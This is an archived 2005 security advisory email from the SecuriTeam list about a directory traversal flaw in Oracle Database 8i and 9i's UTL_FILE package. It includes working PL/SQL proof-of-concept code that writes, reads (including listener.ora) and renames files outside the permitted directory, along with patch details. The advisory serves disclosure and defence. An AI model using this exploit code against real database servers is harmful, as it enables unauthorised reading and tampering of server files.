From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 10 Mar 2005 15:52:25 +0200
Subject: [NEWS] Oracle Database Server Directory Transversal
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20050310145820.E3FCC5739@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Oracle Database Server Directory Transversal
------------------------------------------------------------------------
SUMMARY
<http://www.oracle.com/database/index.html>; Oracle Database servers are
vulnerable to directory traversal, which may allow an attacker to
overwrite, read or rename arbitrary files on the database server.
DETAILS
Vulnerable Systems:
* Oracle Database Server 8i
* Oracle Database Server 9i
Oracle Database Server provides many packages functions to access the OS
file system, some of these functions are not able to access files directly
for example, in order to access files a Directory Object must be created
and grant to users permissions on the object, this object references a
directory in the file system and it can be used by functions to access
files under that directory only. However functions don't properly validate
the input and by supplying a especially constructed string the directory
can be escaped and the parent directories can be accessed, because of this
any file in the same drive as the directory, can be read, renamed,
overwrite, etc.
By default UTL_FILE package has execute permission to public role so any
Oracle database user with permissions on a Directory Object can exploit
this vulnerability.
Proof Of Concept:
Creating/Writing a file:
declare f utl_file.file_type;
begin
f:=UTL_FILE.FOPEN
('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\Unbreakable.txt','w',1000);
UTL_FILE.PUT_LINE (f,'Sure',TRUE);
UTL_FILE.FCLOSE(f);
end;
Reading a file:
SET SERVEROUTPUT ON
declare f utl_file.file_type;
sBuffer Varchar(8000);
begin
f:=UTL_FILE.FOPEN
('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\OracleDir\ora90\network\ADMIN\listener.ora','r');
loop
UTL_FILE.GET_LINE (f,sBuffer);
DBMS_OUTPUT.PUT_LINE(sBuffer);
end loop;
EXCEPTION
when no_data_found then
UTL_FILE.FCLOSE(f);
end;
Rename a file:
begin
UTL_FILE.frename('MEDIA_DIR','\\.\\..\\.\\..\\.\\FileToRename','MEDIA_DIR','\\.\\..\\.\\..\\.\\Unbreakable.txt',TRUE);
end;
Patch Availability:
Oracle has released a patch which can be found at:
<http://metalink.oracle.com>; http://metalink.oracle.com
ADDITIONAL INFORMATION
The information has been provided by <mailto:cesarc56@yahoo.com.> Cesar
Cerrudo.
Oracle's advisory can be found at:
<http://www.oracle.com/technology/deploy/security/pdf/cpu-jan-2005_advisory.pdf>; http://www.oracle.com/technology/deploy/security/pdf/cpu-jan-2005_advisory.pdf
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
